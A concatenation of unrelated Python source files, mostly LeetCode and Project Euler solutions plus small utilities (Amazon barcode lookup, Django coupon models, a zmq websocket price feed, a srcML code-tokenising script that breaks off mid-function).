(-1, 0, 1)
(-1, -1, 2)
思路:先sort array, O(nlogn).
然后从左到右看每一个数num[i],找它右边是否有两个数之和为-num[i], O(n2).
注意,重复的不用看了。
Tag: Array, Two Pointers
Similar Problems: (M) Two sum (M) 3Sum Closest (M) 4Sum
@author: Neo
"""
class Solution:
# @param {integer[]} nums
# @return {integer[][]}
def threeSum(self, nums):
nums.sort()
res = []
for i in xrange(len(nums)):
if i == 0 or nums[i-1] != nums[i]:
left = i + 1
right = len(nums) - 1
while left < right:
s = nums[i] + nums[left] + nums[right]
if s == 0:
res.append([nums[i], nums[left], nums[right]])
left += 1
right -= 1
while left < right and nums[left - 1] == nums[left]:
left += 1
while left < right and nums[right + 1] == nums[right]:
right -= 1
elif s < 0:
left += 1
else:
right -= 1
return res
sol = Solution()
#print sol.threeSum([-1, 0, 1, 2, -1, -4])
print sol.threeSum([0,0,0])
|
995,079 | 41e655ec84a876a76c39d9825c0230f5e86cb8ff | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def rightSideView(self, root: 'TreeNode') -> 'List[int]':
if not root:
return []
queue = collections.deque([root])
res = []
while queue:
for i in range(len(queue) - 1, -1, -1):
temp = queue.popleft()
if i == 0:
res.append(temp.val)
if temp.left != None:
queue.append(temp.left)
if temp.right != None:
queue.append(temp.right)
return res
'''
类似层次遍历:唯一不同的是只需要输出这一层的最后一个
我们需要把这个和循环的i建立联系,这里不能用len(queue)
来建立联系,因为queue长度会变,所有用了减小的循环。
''' |
995,080 | 3fb95acea5607990dc7bd1a54d6fe965c3326c0d | """A program to compute a solution to Problem 107 on Project Euler."""
import timeit
def generate_matrix(filename):
"""Generate a matrix from an input text file.
:param str filename: The name of the network file in .txt format
:rtype dict network: The resulting matrix represented as a
2D list of edge weights
"""
network_file = open(filename, 'r')
matrix = []
for line in network_file:
edges = list(map(lambda weight: 0 if weight == '-' else int(weight),
line.strip().split(',')))
matrix.append(edges)
return matrix
def total_weight(network):
"""Calculate the total weight of edges in a network.
:param dict network: A network represented as a 2D list of edge weights
:rtype int weight: the total weight of the network
"""
weight = 0
for node_connections in network:
for edge in node_connections:
if edge is not None:
weight += edge
return weight // 2
def generate_network_graph(network):
"""Generate a network graph from input network.
:param list network: A network represented as a 2D list of weights
:rtype dict network_graph: A 2D dictionary of {node: {neighbor: weight, ...}, ...}
"""
num_nodes = len(network)
network_graph = {}
for y_node in range(num_nodes):
neighbors = {}
for x_node in range(num_nodes):
if network[y_node][x_node] is not 0:
neighbors[x_node] = network[y_node][x_node]
network_graph[y_node] = neighbors
return network_graph
def prim(network_graph):
"""Implementation of Prim's Minimum Spanning Tree Algorithm.
:param dict network_graph: A 2D dictionary of
{node: {neighbor: weight, ...}, ...}
:rtype dict mst: A minimum spanning tree represented as {edge: weight}
"""
seen_nodes = set()
mst = set()
edges = set()
# Using the first node in the network graph as the root of the tree
current_node = list(network_graph.keys())[0]
while True:
# Adding all edges from the root to the list of edges
for current_neighbor in network_graph[current_node]:
# Edge represented as (weight, [node, neighbor])
edge = (network_graph[current_node][current_neighbor],
frozenset([current_node, current_neighbor]))
if edge in mst:
continue
edges.remove(edge) if edge in edges else edges.add(edge)
if edges:
# Get the smallest edge in the list, remove & add to MST
smallest_edge = min(edges)
edges.remove(smallest_edge)
mst.add(smallest_edge)
# Get the next node to examine
_, (new_node, new_neighbor) = smallest_edge
seen_nodes.add(current_node)
current_node = (new_node if new_neighbor in
seen_nodes else new_neighbor)
else:
break
# Convert from sets to dictionary of {edge: weight}
# 'final_weight' indicates the smallest weight for the given 'final_edge'
# between two nodes that doesn't create a cycle
return dict((final_edge, final_weight) for (final_weight, final_edge) in
mst)
def main():
"""Solve Problem #107 from Project Euler."""
# Generate the network from the given file, and get its original weight
matrix = generate_matrix('network.txt')
old_weight = total_weight(matrix)
# Generate a network graph from the input network to be used in Prim's
# algorithm
graph = generate_network_graph(matrix)
# Generate a minimum spanning tree from the network graph using Prim's
# algorithm
mst = prim(graph)
print(f"Old network weight: {old_weight}")
print(f"New network weight: {old_weight - sum(mst.values())}")
# Main method to solve the problem & indicate execution time in seconds
if __name__ == '__main__':
start = timeit.default_timer()
main()
stop = timeit.default_timer()
print(f"Execution time: {stop - start} seconds")
|
995,081 | ae4e8201243934004a6ec75e367a99740f75f538 | from tetrimino import *
rows, colns = 20, 10
board = create_board(rows, colns)
tet = O
tet["pos"] = (18, 0)
place(tet, board)
tet["pos"] = (8, 0)
place(tet, board)
tet["pos"] = (0, 8)
place(tet, board)
print(board)
move_left(tet, board)
place(tet, board)
print(board)
tet["pos"] = (0, 0)
place(tet, board)
print(board)
move_right(tet, board)
print(board)
move_down(tet, board)
place(tet, board)
tet["pos"] = (18, 8)
move_down(tet, board)
place(tet, board)
print(board)
move_right(tet, board)
print(board)
tet = L
# L["pos"] = (0, 5)
# place(L, board)
# print(board)
# rotate_clockwise(L, board)
# print(board)
# rotate_anticlockwise(L, board)
# print(board)
|
995,082 | 7c866a302c2eaea43490efe7ccdc44cd9c83b1f1 | #!/usr/bin/env python
"""
amazon_api_lookup.py
This module uses the Amazon Product API to lookup barcodes as UPC and
EAN codes, and returns a list of possible product matches in the Amazon
catalog, along with the corresponding Amazon Standard Identification
Number (ASIN).
The actual Amazon Product API credentials necessary for access are
stored in a private, local file (amazon_local_settings.py) via a settings
harness.
"""
import sys
import json
from amazonproduct import API, errors
from amazon_settings import ACCESS_KEY, SECRET_KEY, ASSOCIATE, AMZLOCALE
api = API(locale=AMZLOCALE, access_key_id=ACCESS_KEY, secret_access_key=SECRET_KEY, associate_tag=ASSOCIATE)
def _is_duplicate (asin, current_list):
"""Check the current list of match objects and
return a boolean if the asin already exists or not"""
dup = False
for m in current_list:
try:
if unicode(asin) == m['sku']:
dup = True
break
except KeyError:
pass
return dup
def lookup (barcode, ID_TYPES=['ISBN', 'UPC','EAN']):
"""Lookup the given barcode and return a list of possible matches"""
matches = [] # list of {'desc', 'sku', 'type', 'vnd'}
for idtype in ID_TYPES:
try:
result = api.item_lookup(barcode, SearchIndex='All', IdType=idtype)
for item in result.Items.Item:
if not _is_duplicate(item.ASIN, matches):
matches.append({'desc': unicode(item.ItemAttributes.Title),
'sku': unicode(item.ASIN),
'type': idtype,
'vnd': 'AMZN:'+AMZLOCALE}) # vendor id
except (errors.InvalidAccount, errors.InvalidClientTokenId, errors.MissingClientTokenId):
print >>sys.stderr, "Amazon Product API lookup: bad account credentials"
except errors.TooManyRequests, toomanyerr:
print >>sys.stderr, "Amazon Product API lookup error:", toomanyerr
except errors.InternalError, awserr:
print >>sys.stderr, "Amazon Product API lookup error:", awserr
except errors.InvalidParameterValue:
# this simply means the barcode
# does not exist for the given type,
# so no need to do anything explicit
pass
return matches
if __name__ == "__main__":
"""Create a command-line main() entry point"""
if len(sys.argv) != 2:
# Define the usage
print >>sys.stderr, sys.argv[0], '[barcode]'
else:
# lookup the barcode and return
# a string of the results to stdout,
# or nothing if there were no matches
products = lookup(sys.argv[1])
sys.stdout.write(json.dumps(products))
|
995,083 | cdeb8aafbcaad2975e4fcd42c398b8f2be374595 | # -*- coding: utf-8 -*-
# ==============================================================================
# Imports
# ==============================================================================
from pytest_rpc.fixtures import * # noqa
# ==============================================================================
# Globals
# ==============================================================================
__version__ = '1.1.1'
|
995,084 | 47cb10f212f95e7cfba9132cbf25cc6aeaea58c3 | # -*- coding:utf8 -*-
from django.db import models
from django.utils.timezone import now
from horizon.models import (model_to_dict,
BaseManager,
get_perfect_filter_params)
from Admin_App.ad_coupons.models import (CouponsConfig,
CouponsUsedRecord,
CouponsSendRecord)
from users.models import ConsumerUser
from horizon.main import minutes_15_plus, make_perfect_time_delta
from horizon import main
import datetime
import re
import os
import copy
class BaseCouponsManager(models.Manager):
def get(self, *args, **kwargs):
if 'status' not in kwargs:
kwargs['status'] = 1
instance = super(BaseCouponsManager, self).get(*args, **kwargs)
if now() >= instance.expires:
instance.status = 400
return instance
def filter(self, *args, **kwargs):
if 'status' not in kwargs:
kwargs['status'] = 1
instances = super(BaseCouponsManager, self).filter(*args, **kwargs)
for instance in instances:
if now() >= instance.expires:
instance.status = 400
return instances
class Coupons(models.Model):
"""
我的优惠券
"""
coupons_id = models.IntegerField(u'优惠券ID', db_index=True)
user_id = models.IntegerField(u'用户ID')
# 优惠券状态:1:未使用 2:已使用 400:已过期
status = models.IntegerField(u'优惠券状态', default=1)
expires = models.DateTimeField(u'优惠券过期时间', default=now)
created = models.DateTimeField(u'创建时间', default=now)
updated = models.DateTimeField(u'更新时间', auto_now=True)
objects = BaseCouponsManager()
class Meta:
db_table = 'ys_coupons'
ordering = ['-coupons_id']
def __unicode__(self):
return str(self.coupons_id)
@property
def is_expired(self):
if self.status == 400:
return True
return False
@classmethod
def get_object(cls, **kwargs):
kwargs = get_perfect_filter_params(cls, **kwargs)
try:
return cls.objects.get(**kwargs)
except Exception as e:
return e
@classmethod
def get_perfect_detail(cls, **kwargs):
instance = cls.get_object(**kwargs)
if isinstance(instance, Exception):
return instance
detail = model_to_dict(instance)
admin_instance = CouponsConfig.get_object(pk=instance.coupons_id)
if isinstance(admin_instance, Exception):
return admin_instance
admin_detail = model_to_dict(admin_instance)
pop_keys = ('id', 'created', 'updated', 'expire_in', 'total_count',
'send_count', 'status')
for key in pop_keys:
admin_detail.pop(key)
detail.update(**admin_detail)
return detail
@classmethod
def get_detail_for_make_orders(cls, **kwargs):
kwargs['expires__gt'] = now()
return cls.get_perfect_detail(**kwargs)
@classmethod
def filter_objects(cls, **kwargs):
kwargs = get_perfect_filter_params(cls, **kwargs)
try:
return cls.objects.filter(**kwargs)
except Exception as e:
return e
@classmethod
def get_perfect_detail_list(cls, **kwargs):
_kwargs = copy.deepcopy(kwargs)
if kwargs.get('status') == 400:
kwargs['status'] = 1
kwargs['expires__lte'] = now()
_kwargs.pop('status')
else:
kwargs['expires__gt'] = now()
instances = cls.filter_objects(**kwargs)
details = []
for instance in instances:
consumer_detail = model_to_dict(instance)
admin_instance = CouponsConfig.get_object(pk=instance.coupons_id, **_kwargs)
if isinstance(admin_instance, Exception):
continue
admin_detail = model_to_dict(admin_instance)
pop_keys = ('id', 'created', 'updated', 'expire_in', 'total_count',
'send_count', 'status')
for key in pop_keys:
admin_detail.pop(key)
consumer_detail.update(**admin_detail)
details.append(consumer_detail)
return details
@classmethod
def update_status_for_used(cls, pk):
"""
更新优惠券状态是为使用状态
"""
instance = cls.get_object(pk=pk)
if isinstance(instance, Exception):
return instance
try:
instance.status = 2
instance.save()
except Exception as e:
return e
user = ConsumerUser.get_object(pk=instance.user_id)
used_record_data = {'user_id': instance.user_id,
'coupons_id': instance.coupons_id,
'phone': user.phone}
try:
CouponsUsedRecord(**used_record_data).save()
except:
pass
return instance
@classmethod
def is_used(cls, pk):
instance = cls.get_object(pk=pk)
if isinstance(instance, Exception):
return True
if instance.status == 2:
return True
else:
return False
class CouponsAction(object):
"""
我的优惠券操作
"""
def create_coupons(self, user_ids, coupons):
"""
发放优惠券到用户手中
返回:成功:发放数量,
失败:Exception
"""
if isinstance(user_ids, (str, unicode)):
if user_ids.lower() != 'all':
return Exception('The params data is incorrect.')
user_ids = ConsumerUser.filter_objects()
else:
if not isinstance(user_ids, (list, tuple)):
return Exception('The params data is incorrect.')
if coupons.total_count:
if (coupons.total_count - coupons.send_count) < len(user_ids):
return Exception('The coupon total count is not enough.')
send_count = 0
for item in user_ids:
if hasattr(item, 'pk'):
user_id = item.pk
phone = item.phone
else:
user_id = item
user = ConsumerUser.get_object(pk=user_id)
phone = user.phone
initial_data = {'coupons_id': coupons.pk,
'user_id': user_id,
'expires': make_perfect_time_delta(days=coupons.expire_in,
hours=23,
minutes=59,
seconds=59)}
instances = []
if coupons.each_count:
for i in range(coupons.each_count):
instance = Coupons(**initial_data)
instances.append(instance)
else:
instances = [Coupons(**initial_data)]
for ins in instances:
try:
ins.save()
except Exception as e:
return e
send_count += len(instances)
send_record_data = {'coupons_id': coupons.pk,
'user_id': user_id,
'phone': phone,
'count': len(instances)}
try:
CouponsSendRecord(**send_record_data).save()
except Exception as e:
pass
return send_count
|
995,085 | 0bcfeaf2ff236e243167e506e32a5ed7804c74f0 | '''
You are given two non-empty linked lists representing two non-negative integers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.
You may assume the two numbers do not contain any leading zero, except the number 0 itself.
Example:
Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)
Output: 7 -> 0 -> 8
Explanation: 342 + 465 = 807.
'''
import pytest
# Definition for singly-linked list.
class ListNode:
def __init__(self, x, next):
self.val = x
self.next = next
@pytest.mark.parametrize('input_and_output', [
([
ListNode(2, ListNode(4, ListNode(3, None))),
ListNode(5, ListNode(6, ListNode(4, None)))],
[7, 0, 8]),
([
ListNode(5, None),
ListNode(5, None)],
[0, 1]),
([
ListNode(0, None),
ListNode(7, ListNode(3, None))],
[7, 3])
])
def test_add_two_numbers(input_and_output):
input_first_node = input_and_output[0][0]
input_second_node = input_and_output[0][1]
expected_output = input_and_output[1][::-1]
predicted_output = addTwoNumbers(input_first_node, input_second_node)
last_node = predicted_output
assert isinstance(last_node, ListNode)
while(last_node):
print(last_node.val)
expected_val = expected_output.pop()
assert last_node.val == expected_val
last_node = last_node.next
assert len(expected_output) == 0
def addTwoNumbers(l1: ListNode, l2: ListNode) -> ListNode:
summation = residue = previous_last_node = 0
first_node = l1
while(l1 or l2):
summation = 0
if l1:
summation += l1.val
if l2:
summation += l2.val
summation += residue
if l1:
l1.val = summation % 10
previous_last_node = l1
l1 = l1.next
else:
previous_last_node.next = ListNode(summation % 10)
previous_last_node = previous_last_node.next
residue = int(summation/10)
if l2:
l2 = l2.next
if residue:
previous_last_node.next = ListNode(residue)
return first_node
|
995,086 | 4ecb88c9eedefde13357d568aedb8ab3690c6ca7 | import gevent
from gevent.pywsgi import WSGIServer
import zmq.green as zmq
from geventwebsocket.handler import WebSocketHandler
from itertools import cycle
import json
from pricing_app import app
from pricing_app.model.index import EquityIndex
WAIT = 60
def zmq_qry_pub(context):
"""PUB -- queries and PUBLISHES the data
"""
app.logger.info("zmq_qry_pub started")
socket = context.socket(zmq.PUB)
socket.connect('tcp://127.0.0.1:7000')
timestamps = ['0810', '0811', '0812']
idx = EquityIndex('CAC')
# for ts in cycle(timestamps):
for ts in timestamps:
price_data = idx.components_last_px(ts)
for topic, msg_data in price_data.iteritems():
if msg_data:
# push the code/ticker into the dict
msg_data['ticker'] = topic
# reformat with a colon
msg_data['ts'] = ts[:2] + ':' + ts[2:]
# and jsonify....
msg = json.dumps(msg_data)
socket.send(msg)
gevent.sleep(WAIT)
app.logger.info("zmq_qry_pub closed")
def zmq_sub(context):
"""SUBscribe to PUBlished message then PUBlish to inproc://queue
"""
app.logger.info("zmq_sub started")
sock_incoming = context.socket(zmq.SUB)
sock_outgoing = context.socket(zmq.PUB)
sock_incoming.bind('tcp://*:7000')
sock_outgoing.bind('inproc://queue')
sock_incoming.setsockopt(zmq.SUBSCRIBE, "")
while True:
msg = sock_incoming.recv()
sock_outgoing.send(msg)
class WebSocketApp(object):
"""Funnel messages coming from an inproc zmq socket to the websocket"""
def __init__(self, context):
app.logger.info("WebSocketApp initialised")
self.context = context
def __call__(self, environ, start_response):
app.logger.info("WebSocketApp __call__")
ws = environ['wsgi.websocket']
sock = self.context.socket(zmq.SUB)
sock.setsockopt(zmq.SUBSCRIBE, "")
sock.connect('inproc://queue')
while True:
msg = sock.recv()
ws.send(msg)
def main():
app.logger.info("setting context")
context = zmq.Context()
gevent.spawn(zmq_qry_pub, context)
# websocket server: copies inproc zmq messages to websocket
ws_server = WSGIServer(
('', 9999),
WebSocketApp(context),
handler_class=WebSocketHandler
)
http_server = WSGIServer(('', 8080), app)
http_server.start()
ws_server.start()
zmq_sub(context)
if __name__ == '__main__':
main()
|
995,087 | 6f7d9a72fa98814ada768a258967c370eae5cf97 | import pickle
from train_nn import forward_nn
def create_features(x):
phi = [0 for i in range(len(ids))]
words = x.strip().split()
for word in words:
if 'UNI:'+word in ids:
phi[ids['UNI:'+word]] += 1
return phi
if __name__ == '__main__':
test_f = '../../data/titles-en-test.word'
answer = 'my_answer.nn'
with open('network5_s_l.dump', 'rb') as net_f:
net = pickle.load(net_f)
with open('ids5_s_l.dump', 'rb') as ids_f:
ids = pickle.load(ids_f)
with open(answer, 'w') as ans_f, open(test_f, 'r') as t_f:
for x in t_f:
x = x.strip()
x_l = x.lower()
phi_0 = create_features(x_l)
phiS = forward_nn(net, phi_0)
y_ = (1 if phiS[len(net)][0] >= 0 else -1)
ans_f.write ('{}\t{}\n'.format(y_, x))
|
995,088 | c42a7228ea7859a51e3f20826a26f0f04fe003b5 | import requests
from .constants import DEFAULT_API_PATH, OLD_API_PATH
# Utility methods
def raise_for_status(response):
"""
Custom raise_for_status with more appropriate error message.
"""
http_error_msg = ""
if 400 <= response.status_code < 500:
http_error_msg = "{} Client Error: {}".format(
response.status_code, response.reason
)
elif 500 <= response.status_code < 600:
http_error_msg = "{} Server Error: {}".format(
response.status_code, response.reason
)
if http_error_msg:
try:
more_info = response.json().get("message")
except ValueError:
more_info = None
if more_info and more_info.lower() != response.reason.lower():
http_error_msg += ".\n\t{}".format(more_info)
raise requests.exceptions.HTTPError(http_error_msg, response=response)
def clear_empty_values(args):
"""
Scrap junk data from a dict.
"""
result = {}
for param in args:
if args[param] is not None:
result[param] = args[param]
return result
def format_old_api_request(dataid=None, content_type=None):
if dataid is not None:
if content_type is not None:
return "{}/{}.{}".format(OLD_API_PATH, dataid, content_type)
return "{}/{}".format(OLD_API_PATH, dataid)
if content_type is not None:
return "{}.{}".format(OLD_API_PATH, content_type)
raise Exception(
"This method requires at least a dataset_id or content_type."
)
def format_new_api_request(dataid=None, row_id=None, content_type=None):
if dataid is not None:
if content_type is not None:
if row_id is not None:
return "{}{}/{}.{}".format(
DEFAULT_API_PATH, dataid, row_id, content_type
)
return "{}{}.{}".format(DEFAULT_API_PATH, dataid, content_type)
raise Exception("This method requires at least a dataset_id or content_type.")
def authentication_validation(username, password, access_token):
"""
Only accept one form of authentication.
"""
if bool(username) is not bool(password):
raise Exception("Basic authentication requires a username AND" " password.")
if (username and access_token) or (password and access_token):
raise Exception(
"Cannot use both Basic Authentication and"
" OAuth2.0. Please use only one authentication"
" method."
)
def download_file(url, local_filename):
"""
Utility function that downloads a chunked response from the specified url to a local path.
This method is suitable for larger downloads.
"""
response = requests.get(url, stream=True)
with open(local_filename, "wb") as outfile:
for chunk in response.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
outfile.write(chunk)
|
995,089 | ebedef4fbc5ab8912a04677c2d202050a8a361b3 | # """
# This is the interface that allows for creating nested lists.
# You should not implement it, or speculate about its implementation
# """
#class NestedInteger:
# def __init__(self, value=None):
# """
# If value is not specified, initializes an empty list.
# Otherwise initializes a single integer equal to value.
# """
#
# def isInteger(self):
# """
# @return True if this NestedInteger holds a single integer, rather than a nested list.
# :rtype bool
# """
#
# def add(self, elem):
# """
# Set this NestedInteger to hold a nested list and adds a nested integer elem to it.
# :rtype void
# """
#
# def setInteger(self, value):
# """
# Set this NestedInteger to hold a single integer equal to value.
# :rtype void
# """
#
# def getInteger(self):
# """
# @return the single integer that this NestedInteger holds, if it holds a single integer
# Return None if this NestedInteger holds a nested list
# :rtype int
# """
#
# def getList(self):
# """
# @return the nested list that this NestedInteger holds, if it holds a nested list
# Return None if this NestedInteger holds a single integer
# :rtype List[NestedInteger]
# """
"""
// Time Complexity : O(n)
// Space Complexity : O(n)
// Did this code successfully run on Leetcode : Yes
// Any problem you faced while coding this : No
// Your code here along with comments explaining your approach
Algorithm Explanation
Given below
"""
class Solution:
def depthSum(self, nestedList: List[NestedInteger]) -> int:
"""
Since we deal with the depth, we can go with the DFS approach where we iterate over the list and for each nested list type,we recurse with the depth + 1, else we add the sum to the result
"""
final_sum = 0
def dfs(nlist,depth):
nonlocal final_sum
#no base case
#logic
for ele in nlist:
if ele.isInteger():
#add the value to the sum
final_sum += ele.getInteger() * depth
else:
dfs(ele.getList(),depth+1)
dfs(nestedList,1)
return final_sum |
995,090 | 51bc2ac76f1d15205a786d42cf6d8048927eae80 | '''
Created on Mar 18, 2013
@author: joshua
'''
import xml.etree.ElementTree as ET
import re
import camelcase_sep
import stemming.porter2
import Stemmer
from gensim import corpora, models, similarities
import numpy as np
import scipy.spatial.distance
from sklearn import mixture
import math
from functools import wraps
from time import time
import pickle, os, copy, string, argparse, cProfile, logging, sys
import pypr.clustering.gmm as gmm
from guppy import hpy
def timed(f):
@wraps(f)
def wrapper(*args, **kwds):
start = time()
result = f(*args, **kwds)
elapsed = time() - start
print "%s took %d seconds to finish" % (f.__name__, elapsed)
return result
return wrapper
def setup():
parser = argparse.ArgumentParser()
parser.add_argument('--sys', type=str, required=True)
parser.add_argument('--srcml', type=str, required=True)
parser.add_argument('--weights', type=str, choices=['uni', 'em'], default='uni')
parser.add_argument('--lang', type=str, choices=['java', 'c'], default='java')
args = vars(parser.parse_args())
#EASYMOCK_NAME = 'easymock'
#JUNIT_NAME = 'junit'
#JHOTDRAW_NAME = 'jhotdraw'
sysname = args['sys']
#junitFilename = '/home/joshua/Documents/source/junit4.5/junit4.5.xml'
#easymockFilename = '/home/joshua/Documents/source/easymock2.4/src/easymock2.4.xml'
#jhotdrawFilename = '/home/joshua/Documents/source/JHotDraw 7.4.1/Source/jhotdraw7/src/main/jhotdraw7.4.1.xml'
selectedFilename = args['srcml']
tree = ET.parse(selectedFilename)
#root = tree.getroot()
return args, sysname, tree
def get_all_text(elem):
text = ''
#if not elem.text == None:
# text = text + ' ' + elem.text
if elem.tag == 'comment':
print 'get_all_text was passed a comment tag'
return text
for child in elem:
if child.tag == 'comment':
continue
if child.text == None:
pass
else:
text = text + ' ' + child.text
text = text + get_all_text(child)
return text
def recurse_for_tag(elem,tag):
comments = []
for child in elem:
if child.tag == tag:
comments.append(child)
else:
comments.extend(recurse_for_tag(child,tag))
return comments
def print_all(elem):
for child in elem:
if child.text == None:
pass
else:
print child.text,
print_all(child)
def get_function_info(currContainerName, function):
currFuncName = "ERROR:INVALID_FUNCTION_NAME"
allFuncNames = ''
for functionName in function.findall('name'):
if not functionName.text == None:
currFuncName = functionName.text
allFuncNames = allFuncNames + ' ' + currFuncName
else:
currFuncName = functionName.find('name').text
allFuncNames = allFuncNames + ' ' + currFuncName
#print currContainerName,'.',currFuncName
#print currContainerName,'.',currFuncName
allParameterListText = ''
for parameterList in function.findall('parameter_list'):
if not parameterList.text == None:
parameterListText = get_all_text(parameterList)
#print currContainerName, '.', currFuncName, '.', parameterListText
allParameterListText = allParameterListText + ' ' + parameterListText
else:
errorParamListStr = 'ERROR:BROKEN_PARAM_LIST'
#print errorParamListStr
parameterListText = parameterListText + ' ' + errorParamListStr
allFunctionBlockText = ''
for block in function.findall('block'):
#print get_all_text(block)
allFunctionBlockText = allFunctionBlockText + ' ' + get_all_text(block)
return allFuncNames, allParameterListText, allFunctionBlockText
def convert_to_alpha_only(inString):
pattern = re.compile('[^a-zA-Z]+')
return pattern.sub(' ', inString)
'''
takes a raw list of sets of words in a zone and converts it to the set of documents form expected by
gensim
'''
@timed
def createbow(args, unit_items):
stopWordsFilename = "/home/joshua/Applications/mallet-2.0.7/stoplists/en.txt"
stopWordsFile = open(stopWordsFilename, 'r')
stoplist = set([line.strip() for line in stopWordsFile])
stopWordsFile.close()
javaPlWordsFilename = 'res/javakeywords'
cPlWordsFilename = 'res/ckeywords'
selectedPlWordsFilename = ''
if args['lang'] == 'java':
selectedPlWordsFilename = javaPlWordsFilename
elif args['lang'] == 'c':
selectedPlWordsFilename = cPlWordsFilename
else:
raise Exception('invalid language selected: ' + args['lang'])
plWordsFile = open(selectedPlWordsFilename,'r')
plWordList = set([line.strip() for line in plWordsFile])
plWordsFile.close()
print ''
print 'stop words:'
print stoplist
print ''
print 'Listing modified unit_items...'
docs = []
filenames = []
stemmer = Stemmer.Stemmer('english')
for i, (filename, list) in enumerate(unit_items.iteritems()):
print i, filename
itemsStr = ' '.join(list)
logging.warning('\t' + 'Raw:')
logging.debug('\t' + itemsStr)
itemsStr = convert_to_alpha_only(itemsStr)
logging.warning('\t' + 'Alphabetic only:')
logging.debug( '\t' + itemsStr)
itemsStr = camelcase_sep.separateCamelCase(itemsStr)
logging.warning( '\t' + 'Camel case separated and all lower case:')
logging.debug( '\t' + itemsStr)
doc = [word for word in itemsStr.lower().split() if word not in stoplist]
logging.warning( '\t' + 'Removed stop words:')
logging.debug( '\t' + str(doc))
doc = [word for word in doc if word not in plWordList]
logging.warning( '\t' + 'Removed pl words:')
logging.debug( '\t' + str(doc))
#doc = [stemming.porter2.stem(word) for word in doc]
doc = stemmer.stemWords(doc)
logging.warning( '\t' + 'Stemmed words:')
logging.debug( '\t' + str(doc))
filenames.append(filename)
docs.append(doc)
# remove words that appear only once
'''all_tokens = sum(docs, [])
tokens_once = set(word for word in set(all_tokens) if all_tokens.count(word) == 1)
docs = [[word for word in text if word not in tokens_once]
for text in docs]
for index,doc in enumerate(docs):
logging.warning( filenames[index])
logging.warning( '\t' + 'Removed words that appear only once')
logging.debug( '\t' + str(doc))'''
return docs,filenames
def cos_sim(a,b):
denom = (np.linalg.norm(a)*np.linalg.norm(b))
if denom == 0:
denom = 0.0000001
return np.dot(a,b)/denom
def conv_sparse_doc_to_full_doc(numTokens, doc):
docFull = [0 for i in range(numTokens)]
for id, value in doc:
docFull[id] = value
return docFull
@timed
def extract_java_toks(tree, zones):
units = {}
for zone in zones:
units[zone] = {}
print 'Listing classes...'
for unit in tree.iter('unit'):
if not unit.get('filename') == None:
#print unit.get('filename')
filename = unit.get('filename')
units['class'][filename] = []
for clas in unit.iter('class'):
for className in clas.findall('name'):
if not className.text == None: #print className.text
units['class'][filename].append(className.text)
else:
units['class'][filename].append(className.find('name').text) #print className.find('name').text
for unitFilename, classNames in units['class'].iteritems():
print unitFilename
for className in classNames:
print className
print ''
print 'Listing classes with more info...'
for unit in tree.iter('unit'):
if not unit.get('filename') == None:
filename = unit.get('filename')
units['fields'][filename] = []
units['func_names'][filename] = []
units['params'][filename] = []
units['func_blocks'][filename] = []
for clas in unit.iter('class'):
currclassName = 'ERROR:INVALID_CLASS_NAME'
for className in clas.findall('name'):
if not className.text == None:
currClassName = className.text
print currClassName
else:
currClassName = className.find('name').text
print currClassName
for decl_stmt in clas.findall('block/decl_stmt'):
#print get_all_text(decl_stmt)
units['fields'][filename].append(get_all_text(decl_stmt))
for constructor in clas.iter('constructor'):
allFuncNames, paramText, functionText = get_function_info(currClassName, constructor)
units['func_names'][filename].append(allFuncNames)
units['params'][filename].append(paramText)
units['func_blocks'][filename].append(functionText)
for function in clas.iter('function'):
allFuncNames, paramText, functionText = get_function_info(currClassName, function)
units['func_names'][filename].append(allFuncNames)
units['params'][filename].append(paramText)
units['func_blocks'][filename].append(functionText)
for unitFilename, fieldText in units['fields'].iteritems():
print unitFilename
print '\t' + str(fieldText)
for unitFilename, funcNames in units['func_names'].iteritems():
print unitFilename
print '\t' + str(funcNames)
for unitFilename, params in units['params'].iteritems():
print unitFilename
print '\t' + str(params)
for unitFilename, blocks in units['func_blocks'].iteritems():
logging.debug( unitFilename)
logging.debug( '\t' + str(blocks) )
print ''
print 'Listing comments of each unit...'
for unit in tree.iter('unit'):
if not unit.get('filename') == None:
#print unit.get('filename')
filename = unit.get('filename')
units['comments'][filename] = []
for clas in unit.iter('class'):
'''for className in clas.findall('name'):
if not className.text == None:
#print className.text
pass
else:
#print className.find('name').text
pass'''
for comment in recurse_for_tag(clas, 'comment'):
#print comment.text
units['comments'][filename].append(comment.text)
commentStart = False
for comment in unit.findall('comment'):
if commentStart == True: #print comment.text
units['comments'][filename].append(comment.text)
else:
commentStart = True
for unitFilename, comments in units['comments'].iteritems():
print unitFilename
print '\t' + str(comments)
return units
@timed
def extract_c_toks(tree, zones):
units = {}
for zone in zones:
units[zone] = {}
logging.debug('Listing variables in module scope...')
for unit in tree.iter('unit'):
if not unit.get('filename') == None:
filename = unit.get('filename')
logging.debug( 'unit filename:', filename)
units['modvars'][filename] = []
for modvar in unit.findall('decl_stmt'):
modvarText = get_all_text(modvar)
logging.debug( modvarText)
units['modvars'][filename].append(modvarText)
logging.debug( '')
logging.debug( 'Listing functions with more info...')
for unit in tree.iter('unit'):
if unit.get('filename') != None:
filename = unit.get('filename')
units['func_names'][filename] = []
units['params'][filename] = []
units['func_blocks'][filename] = []
for function in unit.iter('function'):
allFuncNames, paramText, functionText = get_function_info(filename, function)
logging.debug('')
logging.debug( allFuncNames )
logging.debug( paramText)
logging.debug( functionText)
logging.debug('')
units['func_names'][filename].append(allFuncNames)
units['params'][filename].append(paramText)
allFunctionBlockText = ''
for block in unit.iter('block'):
allFunctionBlockText = allFunctionBlockText + ' ' + get_all_text(block)
units['func_blocks'][filename].append(allFunctionBlockText)
for unitFilename, funcNames in units['func_names'].iteritems():
logging.debug( unitFilename)
logging.debug( '\t' + str(funcNames))
for unitFilename, params in units['params'].iteritems():
logging.debug( unitFilename)
logging.debug( '\t' + str(params))
for unitFilename, blocks in units['func_blocks'].iteritems():
logging.debug( unitFilename )
logging.debug( '\t' + str(blocks))
logging.debug( '')
logging.debug( 'Listing comments of each unit...')
for unit in tree.iter('unit'):
if not unit.get('filename') == None:
#print unit.get('filename')
filename = unit.get('filename')
units['comments'][filename] = []
for clas in unit.iter('class'):
'''for className in clas.findall('name'):
if not className.text == None:
#print className.text
pass
else:
#print className.find('name').text
pass'''
for comment in recurse_for_tag(clas, 'comment'):
#print comment.text
units['comments'][filename].append(comment.text)
commentStart = False
